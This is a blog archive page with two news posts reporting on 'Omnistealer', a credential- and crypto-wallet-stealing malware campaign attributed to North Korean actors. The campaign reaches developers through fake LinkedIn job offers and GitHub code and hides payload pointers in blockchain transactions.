Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Omnistealer. Show all posts
Omnistealer
Crypto Hacking fake job scams GitHub malware lockchain malware malware North Korean Hackers Omnistealer

Hidden in Plain Sight: Blockchain-Based ‘Omnistealer’ Malware Spreads via Fake Job Offers

 

kWhat began as a seemingly routine freelance opportunity quickly unraveled into a major cybersecurity discovery. Last year, the vice president of engineering at blockchain analytics firm Crystal Intelligence received a LinkedIn message offering web development work. Suspicious of the approach—given the rise of scams tied to fake job offers—he investigated further and uncovered something alarming.

The assignment required running code hosted on GitHub. On closer inspection, the code concealed the early stages of a sophisticated cyberattack. Designed to appear harmless, it could easily deceive developers into executing it as part of routine contract work.

Once activated, the code connects to blockchain networks such as TRON and Aptos, extracting data that points toward the Binance Smart Chain. From there, an additional payload is retrieved. According to Nick Smart, Crystal Intelligence’s chief intelligence officer, this final stage “fetches the final form—malicious code,” enabling extensive data theft from infected systems.

Cybersecurity experts at Ransom-ISAC, a collaborative group of global researchers, have named this malware “Omnistealer.” Its capabilities are vast. “It literally steals everything,” said Ellis Stannard, a core member of the group. Their analysis revealed compatibility with over 60 cryptocurrency wallets, including MetaMask and Coinbase, as well as numerous password managers like LastPass, popular browsers such as Chrome and Firefox, and cloud platforms including Google Drive. Beyond cryptocurrency, the malware can extract sensitive credentials and access permissions.

Initially resembling a typical phishing scheme, the operation turned out to be far more dangerous. By embedding malicious code in blockchain transactions—where data is permanent and difficult to remove—attackers have created a persistent and scalable threat. Researchers warn that once deployed, the malware does not distinguish between personal and corporate data, putting both individuals and organizations at risk.

Investigators say the scale of the attack could surpass that of WannaCry, the global ransomware outbreak that impacted over 200,000 computers in 2017. So far, approximately 300,000 compromised credentials have been linked to this campaign, though experts believe this figure may represent only a fraction of the total.

Further analysis traced parts of the operation to suspicious IP addresses, including one linked to a former U.S. consulate site in Vladivostok, Russia—previously associated with North Korean cyber activities. Smart noted the financial scale of the operation, explaining that hackers leveraging this method have accumulated millions in cryptocurrency.

Researchers also discovered that elements of the malicious code had been quietly embedded in blockchain transactions years before being activated, functioning like dormant digital triggers. “Hiding malicious payloads within blockchain has become an emerging obfuscation technique,” reads a blog post written by collaborators at Ransom-ISAC.

The attack primarily targets software developers and contractors. Hackers pose either as recruiters offering jobs or as freelancers seeking employment. In both cases, they exploit trust to gain access to systems or credentials. Victims have included organizations across various sectors, from financial services and defense to technology and even food delivery businesses.

“Since this case, I haven't been able to look at GitHub the same way,” Stannard said, reflecting on how attackers embed malicious code into legitimate-looking repositories.

Evidence increasingly points to involvement by North Korean state-backed groups. Infrastructure, malware patterns, and cryptocurrency wallets used in the campaign overlap with known operations linked to such actors. Some wallets have even been tied to previous large-scale cyber thefts.

Experts suggest multiple possible motives, including financial gain, credential harvesting for identity fabrication, or enabling covert access to targeted organizations. “Everything about this has DPRK written all over it,” Stannard said, emphasizing the organized and strategic nature of the operation.

The FBI has acknowledged awareness of such tactics, stating: “This technique highlights the continuing evolution of the DPRK's ability to exploit the web3 space.”

Adding another layer of mystery, investigators uncovered unusual files hidden alongside the malware, including audio clips, images, and even technical documents. While their purpose remains unclear, researchers speculate these may represent experiments in covert data storage or communication.

As blockchain adoption grows, experts warn that such techniques will likely become more common. The combination of low-cost execution, permanence of blockchain data, and increasingly accessible coding tools—including AI—makes these attacks easier to replicate and harder to eliminate.

Authorities have been notified, but with investigations ongoing, many questions remain unanswered. For now, cybersecurity professionals urge caution—especially when dealing with unfamiliar code or unsolicited job offers, even from seemingly trusted platforms.
Read more »
Omnistealer
Developers GitHub malware North Korea Omnistealer

Malware Hidden in Blockchain Networks Is Quietly Targeting Developers Worldwide



A new investigation has uncovered a cyberattack method that uses blockchain networks to quietly distribute malware, raising concerns among security researchers about how difficult it may be to stop once it spreads further.

The threat first surfaced when a senior engineering executive at Crystal Intelligence received a freelance opportunity through LinkedIn. The message appeared routine, asking him to review and run code hosted on GitHub. However, the request resembled a known tactic used by a North Korean-linked group often referred to as Contagious Interview, which relies on fake job offers to target developers.

Instead of proceeding, the executive examined the code and found something unusual. Hidden within it was the beginning of a multi-step attack designed to look harmless. A developer following normal instructions would likely execute it without noticing anything suspicious.

Once activated, the code connects to blockchain networks such as TRON and Aptos, which are commonly used because of their low transaction costs. These networks do not contain the malware itself but instead store information that directs the program to another blockchain, Binance Smart Chain. From there, the final malicious payload is retrieved and executed.

Researchers say this last stage installs a powerful data-stealing tool known as “Omnistealer.” According to analysts working with Ransom-ISAC, the malware is designed to extract a wide range of sensitive data. It can access more than 60 cryptocurrency wallet extensions, including MetaMask and Coinbase Wallet, as well as over 10 password managers such as LastPass. It also targets major browsers like Chrome and Firefox and can pull data from cloud storage services like Google Drive. This means attackers are not just stealing cryptocurrency, but also login credentials and internal access to company systems.

What initially looked like a simple phishing attempt turned out to be far more layered. By placing parts of the attack inside blockchain transactions, the attackers have created a system that is extremely difficult to dismantle. Data stored on blockchains cannot easily be removed, which means parts of this malware infrastructure could remain accessible for years.

Researchers believe the scale of this operation could grow rapidly. Some have compared its potential reach to the WannaCry ransomware attack, which disrupted hundreds of thousands of systems worldwide. In this case, however, the method is quieter and more flexible, which may allow it to spread further before being detected. At the same time, investigators are still unsure what the attackers ultimately intend to do with the access they gain.

Further analysis has revealed possible links to North Korean cyber actors. Investigators traced parts of the activity to an IP address in Vladivostok, a location that has previously appeared in investigations involving North Korean operations. Research cited by NATO has noted that North Korea expanded its internet routing through Russia several years ago. Additional findings from Trend Micro connect similar infrastructure to earlier campaigns involving fake recruiters.

The number of affected victims is already significant. Researchers estimate that around 300,000 credentials have been exposed so far, although they believe the real figure could be much higher. Impacted organizations include cybersecurity firms, defense contractors, financial companies, and government entities in countries such as the United States and Bangladesh.

The attackers rely heavily on deception to gain access. In some cases, they pose as recruiters and convince developers to run infected code as part of a hiring process. In others, they present themselves as freelance developers and introduce malicious code directly into company systems through platforms like GitHub.

Developers in rapidly growing tech ecosystems appear to be a key focus. India, for example, has seen a surge in new contributors on GitHub and ranks among the top countries for cryptocurrency adoption. Researchers suggest that a combination of high developer activity and economic incentives may make such regions more vulnerable to these tactics.

Initial contact is typically made through platforms such as LinkedIn, Upwork, Telegram, and Discord. Representatives from these platforms have advised users to be cautious, particularly when asked to download files or execute unfamiliar code outside controlled environments.

Not all targeted organizations appear strategically important, which suggests the attackers may be casting a wide net. However, the presence of defense and security-related entities among the victims raises more serious concerns about potential intelligence-gathering objectives.

Security experts say this campaign reflects a broader shift in how attacks are being designed. Instead of relying on a single point of failure, attackers are combining social engineering, publicly accessible code platforms, and decentralized infrastructure. The use of blockchain in particular adds a layer of persistence that traditional security tools are not designed to handle.

As investigations continue, researchers warn that this may only be an early stage of a much larger problem. The combination of hidden delivery methods, long-term persistence, and unclear intent makes this campaign especially difficult to predict and contain.

Read more »
Subscribe to: Posts (Atom)